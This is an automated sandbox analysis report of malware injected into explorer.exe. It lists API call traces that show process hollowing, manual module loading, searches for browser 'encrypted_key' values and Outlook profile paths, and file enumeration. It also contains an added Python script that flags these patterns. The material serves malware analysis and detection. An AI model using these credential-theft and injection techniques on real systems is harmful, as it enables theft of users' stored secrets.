                                                      • _alldiv.NTDLL(?,?,00000000), ref: 000D32DE
                                                      • _allmul.NTDLL(00000000,?,00000000), ref: 000D32E7
                                                      • _allmul.NTDLL(?,00000000,?,?), ref: 000D3392
                                                        • Part of subcall function 000D16CD: memset.NTDLL ref: 000D172B
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _allmul$_alldivmemset
                                                      • String ID:
                                                      • API String ID: 3880648599-0
                                                      • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                      • Instruction ID: 551e23537cbf28cbaa0111fc500c72726314421728c196db4da424fe4a208fff
                                                      • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                      • Instruction Fuzzy Hash: 12D19A716083418BDB64DF69C580BAEBBE1AF88704F14492EF98593352DB70DE45CBA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FOREIGN KEY constraint failed$new$old
                                                      • API String ID: 0-384346570
                                                      • Opcode ID: daca8e84365f49d8f5c49dd0c85ac85ddbcba5b303c768c0027d9fd21ad7cb59
                                                      • Instruction ID: 2c319ea1fd1de208a8c5170f7e236527ba77f4ec40f88acc92fbac28408f6ca7
                                                      • Opcode Fuzzy Hash: daca8e84365f49d8f5c49dd0c85ac85ddbcba5b303c768c0027d9fd21ad7cb59
                                                      • Instruction Fuzzy Hash: 52D15A707083449FD714DB25C481BBFBBE9ABC8740F10891EFA459B292DB74E941DB92
                                                      APIs
                                                      • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 000C96E7
                                                      • _alldiv.NTDLL(00000000,80000000,?,?), ref: 000C9707
                                                      • _alldiv.NTDLL(00000000,80000000,?,?), ref: 000C9739
                                                      • _alldiv.NTDLL(00000001,80000000,?,?), ref: 000C976C
                                                      • _allmul.NTDLL(?,?,?,?), ref: 000C9798
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _alldiv$_allmul
                                                      • String ID:
                                                      • API String ID: 4215241517-0
                                                      • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                      • Instruction ID: 4ed6ead1f767992a85970b8ac00d8c1b2ddcd2bb71c232838737eade47b59abf
                                                      • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                      • Instruction Fuzzy Hash: 2C213B3111E7655AD7745F555CCCFAF75C9DBE1790F26033EFD01D2292EA528C4080A1
                                                      APIs
                                                      • _allmul.NTDLL(?,00000000,00000000), ref: 000DB1B3
                                                      • _alldvrm.NTDLL(?,?,00000000), ref: 000DB20F
                                                      • _allrem.NTDLL(?,00000000,?,?), ref: 000DB28A
                                                      • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 000DB298
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _alldvrm_allmul_allremmemcpy
                                                      • String ID:
                                                      • API String ID: 1484705121-0
                                                      • Opcode ID: 8e40c15e4f4af4a80cefe73363758988e16c4c325756f2a9d9c4a273f9e8da1e
                                                      • Instruction ID: b873d65e9b63ac81ef1da006d040e5bcd4b0801f6b89ffab2c9cb743b954abd3
                                                      • Opcode Fuzzy Hash: 8e40c15e4f4af4a80cefe73363758988e16c4c325756f2a9d9c4a273f9e8da1e
                                                      • Instruction Fuzzy Hash: 1E4139756083019BC758EF19C89196FBBE6AFC8300F45492EF99987352DB31EC45CB62
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _alldiv_allmul
                                                      • String ID: winTruncate1$winTruncate2
                                                      • API String ID: 727729158-470713972
                                                      • Opcode ID: 482d2d8b92fad3d3c1ab01ce1a76c8f065e84a1b23a4b7e17941d4475c5f922e
                                                      • Instruction ID: 4e31deaf33b0b32424edf6d718150874822a81b94d0374523af5d6a0118ce064
                                                      • Opcode Fuzzy Hash: 482d2d8b92fad3d3c1ab01ce1a76c8f065e84a1b23a4b7e17941d4475c5f922e
                                                      • Instruction Fuzzy Hash: 2721AE31305108ABCF648F29CC85FAF77A9EB86318B15822DFD14CB295D634D8508762
                                                      APIs
                                                      • GetHGlobalFromStream.OLE32(?,?), ref: 000C18A7
                                                      • GlobalFix.KERNEL32(000C4B57), ref: 000C18B6
                                                      • GlobalUnWire.KERNEL32(?), ref: 000C18F4
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C18E8
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Global$Heap$AllocateFromMemoryMoveProcessStreamWire
                                                      • String ID:
                                                      • API String ID: 2207111602-0
                                                      • Opcode ID: 48d9cfc7d52d62ceac37f540dd647e4377d6472fa06f58b4765735def5569386
                                                      • Instruction ID: 09e2922cd47ef2ddb887db81ecddd7a3827ca7cc636d0a6fc96dbb30dc5c6181
                                                      • Opcode Fuzzy Hash: 48d9cfc7d52d62ceac37f540dd647e4377d6472fa06f58b4765735def5569386
                                                      • Instruction Fuzzy Hash: 9801AD35204306AF8B059F659D18EDF7BEAEF8A350B10C42EF80583222DF32CD448A20
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                      • lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                      • lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                      • lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrcatlstrlen
                                                      • String ID:
                                                      • API String ID: 1475610065-0
                                                      • Opcode ID: 45fb1d534a7621876c678f7d97b25d25c8b83790c70a3726d9c9173cabc42959
                                                      • Instruction ID: 4d30f8789ad44f5c05cacdb9ce11480449c1b5baaced4d312f7891b0442361bf
                                                      • Opcode Fuzzy Hash: 45fb1d534a7621876c678f7d97b25d25c8b83790c70a3726d9c9173cabc42959
                                                      • Instruction Fuzzy Hash: 16E0656270021C1B475477AE5C94EFB76DCCBC96A53050039FA08D3203E966DC0546B0
                                                      APIs
                                                      • StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 000C2FC1
                                                      • lstrlen.KERNEL32("encrypted_key":",?,000C3FA8), ref: 000C2FCE
                                                      • StrStrIA.SHLWAPI("encrypted_key":",0011692C), ref: 000C2FDD
                                                        • Part of subcall function 000C190B: lstrlen.KERNEL32(?,?,?,?,00000000,000C2783), ref: 000C192B
                                                        • Part of subcall function 000C190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,000C2783), ref: 000C1930
                                                        • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,?), ref: 000C1946
                                                        • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,00000000), ref: 000C194A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$lstrcat
                                                      • String ID: "encrypted_key":"
                                                      • API String ID: 493641738-877455259
                                                      • Opcode ID: c1c111d1c361ea2280c0eef5f7a872ca0a52f29db80e31099fd2fef06207ef3e
                                                      • Instruction ID: 9c6b67dcc6ef624df4736c2e561888b14e3c99406eaee6f665111c1420be8bfd
                                                      • Opcode Fuzzy Hash: c1c111d1c361ea2280c0eef5f7a872ca0a52f29db80e31099fd2fef06207ef3e
                                                      • Instruction Fuzzy Hash: 96E0222260AA682F83A9ABF52D44DCF3EA89F46210305407CF60193513DF938842C2A4
                                                      APIs
                                                        • Part of subcall function 000C6A81: memset.NTDLL ref: 000C6A9C
                                                      • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 000EF2A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _aulldivmemset
                                                      • String ID: %llu$%llu
                                                      • API String ID: 714058258-4283164361
                                                      • Opcode ID: d7441ef4cf18d0029357730f9c5777b07e4775ebdbfb8b08309078aadb0e519f
                                                      • Instruction ID: 733d781762fd89a8af3b4d8a65a072e1762b99422687671c30c8df4c3b8d9cf5
                                                      • Opcode Fuzzy Hash: d7441ef4cf18d0029357730f9c5777b07e4775ebdbfb8b08309078aadb0e519f
                                                      • Instruction Fuzzy Hash: 7721D4726446566BC714AB64CC42FBFB759AF85730F04823DFA25A72C2DB219C118BE1
                                                      APIs
                                                      • _allmul.NTDLL(?,00000000,?), ref: 000D2174
                                                      • _allmul.NTDLL(?,?,?,00000000), ref: 000D220E
                                                      • _allmul.NTDLL(?,00000000,00000000,?), ref: 000D2241
                                                      • _allmul.NTDLL(000C2E26,00000000,?,?), ref: 000D2295
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _allmul
                                                      • String ID:
                                                      • API String ID: 4029198491-0
                                                      • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                      • Instruction ID: 7aecc024886d43b95e8348e28dd4becad428794acad02cf143f155fdb2df515e
                                                      • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                      • Instruction Fuzzy Hash: 64A18D70708701AFD724EF64C881A6EB7E6AFE8704F00482EF65587352EB71ED458B62
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: memcpymemset
                                                      • String ID:
                                                      • API String ID: 1297977491-0
                                                      • Opcode ID: c619ea2c298dd9c75116f67c9c0684c188a810f16eda2788c5e90550f24386e1
                                                      • Instruction ID: ce6f6b553f9ce9aef2f833e00a544f58f3f1023c0b2831fe884ef76c5f2cd507
                                                      • Opcode Fuzzy Hash: c619ea2c298dd9c75116f67c9c0684c188a810f16eda2788c5e90550f24386e1
                                                      • Instruction Fuzzy Hash: 5F818D716083149FC354DF28C885A6BBBE5EFD8704F54492EF88A87352E770E905CBA2
                                                      APIs
                                                      • lstrlen.KERNEL32(?,?,?,?,00000000,000C2783), ref: 000C192B
                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,000C2783), ref: 000C1930
                                                      • lstrcat.KERNEL32(00000000,?), ref: 000C1946
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 000C194A
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrcatlstrlen
                                                      • String ID:
                                                      • API String ID: 1475610065-0
                                                      • Opcode ID: a7dba3619789455ac5860b3542b82eba2cbc24a0238118d7caf8d9199f850cfb
                                                      • Instruction ID: 7c96ee7986758746c435996a51eed7706ca130184434f2eb8f608aff7d92e415
                                                      • Opcode Fuzzy Hash: a7dba3619789455ac5860b3542b82eba2cbc24a0238118d7caf8d9199f850cfb
                                                      • Instruction Fuzzy Hash: C7E09BA230061C2B472477AE5C94EFF76DCDBD95A53150039F904D3203EE669C0146B0

                                                      Execution Graph

                                                      Execution Coverage:9.3%
                                                      Dynamic/Decrypted Code Coverage:55.1%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:49
                                                      Total number of Limit Nodes:2
Execution graph (interactive figure; node and edge list omitted). API calls reached in the executed nodes: RegCreateKeyExW (node 957, 0x63777), CreateStreamOnHGlobal (node 961, 0x622c8), LoadLibraryA (node 986, 0x6a385), VirtualProtect twice (node 988, 0x6a3e0), StrStrIW (node 974, 0x63458), RegOpenKeyExW (node 975, 0x63523), RegEnumKeyExW (node 977, 0x635b5) and RegCloseKey (node 978, 0x635e4). The 0x6a298 routine (LoadLibraryA + VirtualProtect) is entered from 0x6a1e0, 0x6a1af and 0x6a1f9; the 0x63458 routine (StrStrIW + registry enumeration) is called from 0x63608 and 0x63668.

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
Callgraph (interactive figure; node and edge list omitted): 89 functions, Function_00061000 through Function_0006B192, in the injected explorer.exe region. The most frequently called nodes are Function_00061838 (node 42) and Function_00061860 (node 70). The widest callers are Function_000637F4 (node 79, nine callees), Function_00063458 (node 64, nine callees including itself) and Function_00062BC0 (node 49, eight callees). Function_0006A298 (node 23), the LoadLibraryA/VirtualProtect routine, is reached from Function_0006A1AF, Function_0006A1E0 and Function_0006A1F9 and calls Function_0006A25A.

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
Control-flow graph for function 0x638b0 (figure omitted): entry block 638b0-63907 calls 61ad4, 61838, NtUnmapViewOfSection and 6388c; block 63909-6390c calls 638b0 again (recursive); both paths reach the exit block 63911-6391a.
                                                      APIs
                                                      • NtUnmapViewOfSection.NTDLL ref: 000638F2
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.418873401.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: SectionUnmapView
                                                      • String ID:
                                                      • API String ID: 498011366-0
                                                      • Opcode ID: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                                      • Instruction ID: 07d7c0bebfd5eab35338b42f632c169550439883b7608d4425e9f1fe2b024cbe
                                                      • Opcode Fuzzy Hash: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                                      • Instruction Fuzzy Hash: F3F0A020F11A080FEAAC77FD685D3A822C2EB59310F900629B516C36D3DC398A458352

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.418873401.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CloseEnumOpen
                                                      • String ID:
                                                      • API String ID: 1332880857-0
                                                      • Opcode ID: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                                      • Instruction ID: d4483960c43caaeea037d42a9e10a4b875f7596f5693c41f599e3ec46e3d9013
                                                      • Opcode Fuzzy Hash: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                                      • Instruction Fuzzy Hash: 82416C30718F0C4FDB98EF6D94997AAB6E2FBD8341F04456EA14EC3262DE34D9448782

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
Control-flow graph for function 0x6a298 (figure omitted): blocks 6a298-6a30c form a loop that calls 6a25a at 6a30e-6a31c and re-enters at 6a2a5; blocks 6a31e-6a383 form a second loop; LoadLibraryA is called in block 6a385-6a39e, which returns into 6a39f-6a3df; VirtualProtect is called twice in block 6a41a-6a46a, followed by a tight loop at 6a46e-6a473 and the exit block 6a475-6a484.
                                                      APIs
                                                      • LoadLibraryA.KERNEL32 ref: 0006A397
                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006A441
                                                      • VirtualProtect.KERNELBASE ref: 0006A45F
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.418873401.0000000000069000.00000040.80000000.00040000.00000000.sdmp, Offset: 00069000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_69000_explorer.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 895956442-0
                                                      • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                      • Instruction ID: 006bc09559ba58e1e56ca86166064d69eaa2f5b492dea585316237ca25ff1824
                                                      • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                      • Instruction Fuzzy Hash: 99517D3175892E4BCB24BB7C9CC42F5B3C3F757321B18062AD08AD3385D559D9468B93
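The per-function "APIs" listings in this report (for example NtUnmapViewOfSection at 000638F2, or LoadLibraryA followed by two VirtualProtect calls in the 0006A298 routine, and the StrStrIA search for "encrypted_key":" in the 000C1000 dump) can be triaged mechanically rather than read one block at a time. The Python below is an added example and is not part of the Joe Sandbox report or its tooling: it parses report text in the layout shown here into one record per function block and applies a few heuristic API-set and string rules of its own (process hollowing, manual PE loading, the encrypted_key search). The embedded sample text is constructed to mirror the lines above, and the rule names and the choice to match API sets only against a function's direct calls (not "Part of subcall function" entries) are this example's assumptions.

```python
"""Parse Joe Sandbox per-function 'APIs' listings and flag injection-related API sets.

Added example: not part of the Joe Sandbox report. The line layout mirrors the
report text; rule names and the direct-call-only threshold are this example's own.
"""
import re
from dataclasses import dataclass, field

# Constructed sample in the report's own layout (indentation trimmed), not verbatim report output.
SAMPLE = """\
APIs
• NtUnmapViewOfSection.NTDLL ref: 000638F2
Memory Dump Source
• Source File: 00000014.00000002.418873401.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
APIs
• LoadLibraryA.KERNEL32 ref: 0006A397
• VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006A441
• VirtualProtect.KERNELBASE ref: 0006A45F
Memory Dump Source
• Source File: 00000014.00000002.418873401.0000000000069000.00000040.80000000.00040000.00000000.sdmp, Offset: 00069000, based on PE: false
APIs
• StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 000C2FC1
• lstrlen.KERNEL32("encrypted_key":",?,000C3FA8), ref: 000C2FCE
  • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,?), ref: 000C1946
Memory Dump Source
• Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
"""

# One "• Api.MODULE(args), ref: ADDR" line, optionally prefixed by "Part of subcall function X:".
API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# The "Memory Dump Source" line that closes each function block.
SOURCE_RE = re.compile(r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+)")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: str
    ref: str
    subcall: bool  # True when the line is a "Part of subcall function ..." entry


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    source: str = ""
    offset: str = ""


def parse_blocks(text: str) -> list:
    """Split report text into one FunctionBlock per 'Memory Dump Source' entry."""
    blocks, cur = [], FunctionBlock()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur.calls.append(ApiCall(m["api"], m["mod"], m["args"] or "",
                                     m["ref"].upper(), m["sub"] is not None))
            continue
        m = SOURCE_RE.search(line)
        if m:  # the source line closes the current function's block
            cur.source, cur.offset = m["file"], m["off"].upper()
            blocks.append(cur)
            cur = FunctionBlock()
    return blocks


# Heuristic rules (this example's own, not from the report): an API rule fires when the
# block's *direct* calls cover the whole set; a string rule fires on any argument text.
API_RULES = [
    ("process hollowing: unmaps a section in a target process", {"NtUnmapViewOfSection"}),
    ("manual PE loading: resolves imports and rewrites page protections",
     {"LoadLibraryA", "VirtualProtect"}),
    ("copies an in-memory IStream buffer", {"GetHGlobalFromStream", "RtlMoveMemory"}),
]
STRING_RULES = [
    ("browser credential access: looks for an encrypted_key JSON field", '"encrypted_key":"'),
]


def flag_block(block: FunctionBlock) -> list:
    """Return the names of the rules that match one function block."""
    direct = {c.api for c in block.calls if not c.subcall}
    hits = [name for name, needed in API_RULES if needed <= direct]
    all_args = " ".join(c.args for c in block.calls)
    hits += [name for name, needle in STRING_RULES if needle in all_args]
    return hits


def triage(text: str) -> list:
    """(dump offset, [rule names]) for every flagged function block, in report order."""
    out = []
    for b in parse_blocks(text):
        hits = flag_block(b)
        if hits:
            out.append((b.offset, hits))
    return out


if __name__ == "__main__":
    for off, hits in triage(SAMPLE):
        print(off, "->", "; ".join(hits))
```

Matching API sets against direct calls only keeps a rule tied to the function that actually performs the sequence; the "Part of subcall function" entries are still parsed so string arguments reached through callees (the lstrcat helper above) remain searchable. To run it over a real export, feed the text of the "APIs" / "Memory Dump Source" sections in place of SAMPLE.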

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
Control-flow graph for function 0x6372c (figure omitted): block 6372c-637ba calls 61838 and RegCreateKeyExW; on one path block 637bc-637cb and 637cd-637d3 follow; all paths reach 637d6-637f0, which calls 61860.
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.418873401.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID: ?
                                                      • API String ID: 2289755597-1684325040
                                                      • Opcode ID: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                                      • Instruction ID: 0175cadc1eaba084e880b185854f7669454e214051596b44bd1488a6f786bdce
                                                      • Opcode Fuzzy Hash: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                                      • Instruction Fuzzy Hash: 9E11B970608B4C8FD750DF69D48865AB7E2FB98305F40062EE489C3321DF34D985CB82

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateStreamOnHGlobal.OLE32 ref: 000622D0
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.418873401.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateGlobalStream
                                                      • String ID:
                                                      • API String ID: 2244384528-0
                                                      • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                      • Instruction ID: 6c511f69b69d8d3de49810070f3f7e1f5989998c8ca95c8496505d4ba7d4b445
                                                      • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                      • Instruction Fuzzy Hash: 7AE08C30108B0A8FD798AFBCE4CA07933A1EB9C252B05093EE005CB114D27988C18741

                                                      Execution Graph

                                                      Execution Coverage:15.3%
                                                      Dynamic/Decrypted Code Coverage:96.6%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:233
                                                      Total number of Limit Nodes:7

                                                      Callgraph


                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                      • lstrcatW.KERNEL32(00000000), ref: 00082588
                                                      • PathAppendW.SHLWAPI(00000000,*.*), ref: 00082594
                                                      • FindFirstFileW.KERNELBASE(00000000,?,?,000818F4), ref: 000825A8
                                                      • RtlZeroMemory.NTDLL(00000209,00000209), ref: 000825C3
                                                      • lstrcatW.KERNEL32(00000209,?), ref: 000825E1
                                                      • PathAppendW.SHLWAPI(00000209,?), ref: 000825ED
                                                      • lstrcatW.KERNEL32(00000209,?), ref: 00082611
                                                      • PathAppendW.SHLWAPI(00000209,?), ref: 0008261D
                                                      • StrStrIW.SHLWAPI(00000209,?), ref: 0008262C
                                                      • FindNextFileW.KERNELBASE(00000000,?,?,000818F4), ref: 00082644
                                                      • FindClose.KERNEL32(00000000,?,000818F4), ref: 00082653
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
                                                      • String ID: *.*
                                                      • API String ID: 1648349226-438819550
                                                      • Opcode ID: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
                                                      • Instruction ID: 9ab04f0758e8323f23007aef3f0b497425df495bdb796eec7b4485748527ddf8
                                                      • Opcode Fuzzy Hash: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
                                                      • Instruction Fuzzy Hash: C9217171204315AFE710BF209D589AFBBECFFC5B05F04051DFAD1A2251EB389A168B66

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF
                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0008103A
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081043
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.421457935.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                      • String ID:
                                                      • API String ID: 1675517319-0
                                                      • Opcode ID: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
                                                      • Instruction ID: 55d5dd33b2f901c1089b15beaab3eab97d09ece425fd31eaa01e34cb85dd0178
                                                      • Opcode Fuzzy Hash: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
                                                      • Instruction Fuzzy Hash: 23D05E31800260B7EA657774BC1E9CA2A8CBF45730B254251B6E5961D3C9794A818B71

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008107F
                                                      • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081093
                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810A7
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000), ref: 000810BB
